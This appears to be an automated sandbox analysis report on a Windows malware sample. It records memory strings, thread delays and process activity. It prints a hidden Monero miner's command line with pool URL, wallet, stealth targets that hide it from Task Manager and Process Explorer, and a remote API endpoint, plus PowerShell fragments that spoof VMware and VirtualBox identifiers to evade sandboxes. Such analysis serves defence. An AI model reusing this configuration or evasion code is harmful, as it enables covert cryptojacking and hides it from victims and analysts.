                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DIALER.EXE--ALGO=RX/0--URL=GULF.MONEROOCEAN.STREAM:10128--USER=4AXNHSYV9A9EMWEHMN6IGQ1ERJGJFGYEBCSX3AZG7AFHQU9CMGFQF77CRFPNFHPUN6HCVKWS4NTOYRXKFSBKFH8P7E5XSLU--PASS=--CPU-MAX-THREADS-HINT=40--CINIT-WINRING=VOEEOIQRJNLA.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE--CINIT-API=HTTPS://WEA9UFGH438790ATRHJWIUJNGZHE4WA709RTHJCWA9NV8N980AVW.ROAST247.EU.ORG/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=100--CINIT-ID=CWZYHCJPGGLTBMJX
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE8
                      Source: dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXEX
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3053963293.0000025545EA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3605895268.0000025545EAE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000003.3054668059.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: T=40 --CINIT-WINRING="VOEEOIQRJNLA.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,P
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545E25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE,PORTMASTER-START.EXE
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Memory allocated: 24D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Memory allocated: 1A6B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Window / User API: threadDelayed 5847
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Window / User API: threadDelayed 3951
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6046
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3635
                      Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 8444
                      Source: C:\Windows\System32\winlogon.exe | Window / User API: threadDelayed 1554
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6952
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2607
                      Source: C:\Windows\System32\lsass.exe | Window / User API: threadDelayed 9965
                      Source: C:\Windows\System32\dwm.exe | Window / User API: threadDelayed 9866
                      Source: C:\Windows\System32\dialer.exe | Window / User API: threadDelayed 1799
                      Source: C:\Windows\System32\dialer.exe | Window / User API: threadDelayed 482
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 1822
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Window / User API: threadDelayed 834
                      Source: C:\ProgramData\Google\Chrome\updater.exe | Dropped PE file which has not been started: C:\Windows\Temp\voeeoiqrjnla.sys
                      Source: C:\Windows\System32\lsass.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                      Source: C:\Windows\System32\svchost.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                      Source: C:\Windows\System32\dialer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\system64x.exe | API coverage: 3.7 %
                      Source: C:\ProgramData\Google\Chrome\updater.exe | API coverage: 3.0 %
                      Source: C:\Windows\System32\lsass.exe | API coverage: 6.6 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
                      Source: C:\Windows\System32\dialer.exe | API coverage: 1.1 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 4.8 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 8.2 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 4.5 %
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | API coverage: 7.9 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 4.8 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 4.5 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
                      Source: C:\Windows\System32\svchost.exe | API coverage: 5.1 %
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe TID: 1680 | Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\SysWOW64\system64x.exe TID: 1720 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 576 | Thread sleep count: 6046 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5680 | Thread sleep count: 3635 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3680 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\System32\winlogon.exe TID: 7400 | Thread sleep count: 8444 > 30
                      Source: C:\Windows\System32\winlogon.exe TID: 7400 | Thread sleep time: -8444000s >= -30000s
                      Source: C:\Windows\System32\winlogon.exe TID: 7400 | Thread sleep count: 1554 > 30
                      Source: C:\Windows\System32\winlogon.exe TID: 7400 | Thread sleep time: -1554000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 | Thread sleep count: 6952 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460 | Thread sleep count: 2607 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 | Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\lsass.exe TID: 7516 | Thread sleep count: 9965 > 30
                      Source: C:\Windows\System32\lsass.exe TID: 7516 | Thread sleep time: -9965000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7524 | Thread sleep count: 247 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7524 | Thread sleep time: -247000s >= -30000s
                      Source: C:\Windows\System32\dwm.exe TID: 7852 | Thread sleep count: 9866 > 30
                      Source: C:\Windows\System32\dwm.exe TID: 7852 | Thread sleep time: -9866000s >= -30000s
                      Source: C:\Windows\System32\dialer.exe TID: 7676 | Thread sleep count: 1799 > 30
                      Source: C:\Windows\System32\dialer.exe TID: 7676 | Thread sleep time: -179900s >= -30000s
                      Source: C:\Windows\System32\dialer.exe TID: 7808 | Thread sleep count: 482 > 30
                      Source: C:\Windows\System32\dialer.exe TID: 7808 | Thread sleep time: -48200s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7864 | Thread sleep count: 252 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7864 | Thread sleep time: -252000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7892 | Thread sleep count: 253 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7892 | Thread sleep time: -253000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7908 | Thread sleep count: 87 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7908 | Thread sleep time: -87000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7916 | Thread sleep count: 241 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7916 | Thread sleep time: -241000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7960 | Thread sleep count: 200 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7960 | Thread sleep time: -200000s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924 | Thread sleep count: 1822 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7392 | Thread sleep count: 162 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7392 | Thread sleep time: -162000s >= -30000s
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924 | Thread sleep count: 834 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924 | Thread sleep count: 218 > 30
                      Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 7924 | Thread sleep count: 134 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7968 | Thread sleep count: 251 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7968 | Thread sleep time: -251000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7984 | Thread sleep count: 239 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7984 | Thread sleep time: -239000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7992 | Thread sleep count: 245 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 7992 | Thread sleep time: -245000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 8000 | Thread sleep count: 246 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 8000 | Thread sleep time: -246000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 8016 | Thread sleep count: 253 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 8016 | Thread sleep time: -253000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 8028 | Thread sleep count: 241 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 8028 | Thread sleep time: -241000s >= -30000s
                      Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\dialer.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\winlogon.exe | Code function: 22_2_000001E85898DCE0 FindFirstFileExW | 22_2_000001E85898DCE0
                      Source: C:\Windows\System32\lsass.exe | Code function: 31_2_00000140AE86DCE0 FindFirstFileExW | 31_2_00000140AE86DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 32_2_00000195DD5CDCE0 FindFirstFileExW | 32_2_00000195DD5CDCE0
                      Source: C:\Windows\System32\dwm.exe | Code function: 33_2_000001160CA9DCE0 FindFirstFileExW | 33_2_000001160CA9DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 48_2_00000257E10ADCE0 FindFirstFileExW | 48_2_00000257E10ADCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 49_2_000001F28C93DCE0 FindFirstFileExW | 49_2_000001F28C93DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 50_2_000001CA9854DCE0 FindFirstFileExW | 50_2_000001CA9854DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 51_2_000001D26531DCE0 FindFirstFileExW | 51_2_000001D26531DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 52_2_00000254A27DDCE0 FindFirstFileExW | 52_2_00000254A27DDCE0
                      Source: C:\Windows\System32\wbem\WMIADAP.exe | Code function: 53_2_0000028708E6DCE0 FindFirstFileExW | 53_2_0000028708E6DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 54_2_0000024B87DDDCE0 FindFirstFileExW | 54_2_0000024B87DDDCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 55_2_00000205FD40DCE0 FindFirstFileExW | 55_2_00000205FD40DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 56_2_000001A2056ADCE0 FindFirstFileExW | 56_2_000001A2056ADCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 57_2_0000018EC1F6DCE0 FindFirstFileExW | 57_2_0000018EC1F6DCE0
                      Source: C:\Windows\System32\svchost.exe | Code function: 58_2_0000025CE3E0DCE0 FindFirstFileExW | 58_2_0000025CE3E0DCE0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000037.00000003.2529787364.00000205FBEAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: svchost.exe, 00000037.00000003.2520498688.00000205FBA12000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000037.00000002.3596780543.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000037.00000000.2494846918.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
                      Source: lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicvssNT SERVICE
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>ND
                      Source: svchost.exe, 00000034.00000000.2470028024.00000254A202B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545DE9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
                      Source: dwm.exe, 00000021.00000000.2434430790.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: PointVMware&P
                      Source: dwm.exe, 00000021.00000000.2434430790.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000=
                      Source: svchost.exe, 00000037.00000003.2520498688.00000205FBA12000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: storahciNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000037.00000003.2529787364.00000205FBEAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: LSI_SASVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: lsass.exe, 0000001F.00000000.2414749450.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596610784.00000140AD813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.2427096829.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3594547345.00000195DD613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2458947467.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.3595744718.000001F28C22B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2461762289.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3592602441.000001CA9782A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2470113786.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.3596359189.00000254A2043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000037.00000002.3596780543.00000205FAC2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: dwm.exe, 00000021.00000000.2434430790.0000011607ED0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: svchost.exe, 00000037.00000000.2494975014.00000205FAC96000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMCI: Using capabilities (0x1c).
                      Source: lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicshutdownNT SERVICE
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
                      Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2431393895.000000001C7F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW>Mi%SystemRoot%\system32\mswsock.dlllemscorlibSystemEnumMAPSReportingTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MpPreferencevalue__DisabledBasicAdvancedSubmitSamplesConsentTypeAlwaysPromptSendSafeSamplesNeverSendSendAllSamplesDayEverydaySundayMondayTuesdayWednesdayThursdayFridaySaturdayNeverScanTypeQuickScanFullScanScanDirectionBothIncomingOutcoming
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicNECVMWarVMware SATA CD00
                      Source: svchost.exe, 00000037.00000000.2497360390.00000205FBA00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
                      Source: svchost.exe, 00000037.00000002.3615722610.00000205FB933000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmcir:m
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>GK2SBZ
                      Source: lsass.exe, 0000001F.00000002.3604819718.00000140AE074000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>2/Rzxa
                      Source: svchost.exe, 00000020.00000000.2427459904.00000195DD66A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: svchost.exe, 00000032.00000000.2461656247.000001CA97800000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
                      Source: svchost.exe, 00000037.00000000.2497789179.00000205FBA43000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      Source: svchost.exe, 00000037.00000000.2497015931.00000205FB943000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
                      Source: svchost.exe, 00000037.00000002.3620440164.00000205FBD08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>q2/Rzx
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
                      Source: svchost.exe, 00000037.00000002.3595768053.00000205FABD0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
